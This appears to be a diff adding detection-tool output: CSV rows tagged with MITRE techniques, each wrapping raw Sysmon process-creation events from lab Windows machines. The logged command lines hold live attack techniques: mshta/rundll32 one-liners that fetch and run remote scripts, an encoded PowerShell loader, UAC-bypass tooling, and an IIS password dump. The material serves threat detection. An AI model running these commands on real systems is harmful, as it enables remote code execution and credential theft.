+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T11:23:18.824713Z"">
+    </TimeCreated>
+    <EventRecordID>5410</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 11:23:17.702</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6EA5-5D45-0000-00108FD3E100</Data>
+    <Data Name=""ProcessId"">7844</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6EA5-5D45-0000-0010EED0E100</Data>
+    <Data Name=""ParentProcessId"">4768</Data>
+    <Data Name=""ParentImage"">C:\Windows\SysWOW64\WerFault.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe &quot;C:\Program Files\Windows Media Player\osk.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T10:51:48.431273Z"">
+    </TimeCreated>
+    <EventRecordID>5308</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 10:51:47.872</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6743-5D45-0000-001068D7B500</Data>
+    <Data Name=""ProcessId"">6456</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\windows\system32\cmd.exe &quot;C:\Program Files\Windows Media Player\osk.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
+    <Data Name=""LogonId"">0x18d3fb</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6742-5D45-0000-00104A66B500</Data>
+    <Data Name=""ParentProcessId"">6380</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
+    <Data Name=""ParentCommandLine"">UACME.exe  32</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-13T20:11:42.278672Z"">
+    </TimeCreated>
+    <EventRecordID>2196442</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5340"" ThreadID=""7092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-13 20:11:42.277</Data>
+    <Data Name=""ProcessGuid"">00247C92-09FE-5F86-0000-0010AC861401</Data>
+    <Data Name=""ProcessId"">6372</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\Windows\System32\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-DE70-5F85-0000-002059F80600</Data>
+    <Data Name=""LogonId"">0x6f859</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-09FE-5F86-0000-001051841401</Data>
+    <Data Name=""ParentProcessId"">1716</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wuauclt.exe</Data>
+    <Data Name=""ParentCommandLine"">wuauclt.exe   /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer </Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe  /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
+    </TimeCreated>
+    <EventRecordID>4125</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
+    <Data Name=""ProcessId"">1532</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe  /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-4F8A-5CE3-0000-0010C5BB4800</Data>
+    <Data Name=""ParentProcessId"">3548</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;cmd.exe&quot; /s /k pushd &quot;C:\Users\IEUser\Desktop&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot;  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-01-26T13:21:13.978709Z"">
+    </TimeCreated>
+    <EventRecordID>2429137</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5272"" ThreadID=""6060"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>LAPTOP-JU4M3I0E</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2021-01-26 13:21:13.976</Data>
+    <Data Name=""ProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
+    <Data Name=""ProcessId"">23168</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.1316 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;  /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
+    <Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
+    <Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
+    <Data Name=""LogonId"">0x26f746a2</Data>
+    <Data Name=""TerminalSessionId"">5</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010348FD92E</Data>
+    <Data Name=""ParentProcessId"">2988</Data>
+    <Data Name=""ParentImage"">C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:20.124804Z"">
+    </TimeCreated>
+    <EventRecordID>5979</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:20.084</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010F2DEFF00</Data>
+    <Data Name=""ProcessId"">2772</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T00:32:35.352012Z"">
+    </TimeCreated>
+    <EventRecordID>16248</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1996"" ThreadID=""1832"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 00:32:35.289</Data>
+    <Data Name=""ProcessGuid"">365ABB72-69A3-5CD7-0000-00109D7F2200</Data>
+    <Data Name=""ProcessId"">1860</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-DC77-5CD7-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-69A3-5CD7-0000-001064792200</Data>
+    <Data Name=""ParentProcessId"">3432</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\taskeng.exe</Data>
+    <Data Name=""ParentCommandLine"">taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close(); ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:18.286776Z"">
+    </TimeCreated>
+    <EventRecordID>4902</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:18.241</Data>
+    <Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
+    <Data Name=""ProcessId"">776</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:44.055762Z"">
+    </TimeCreated>
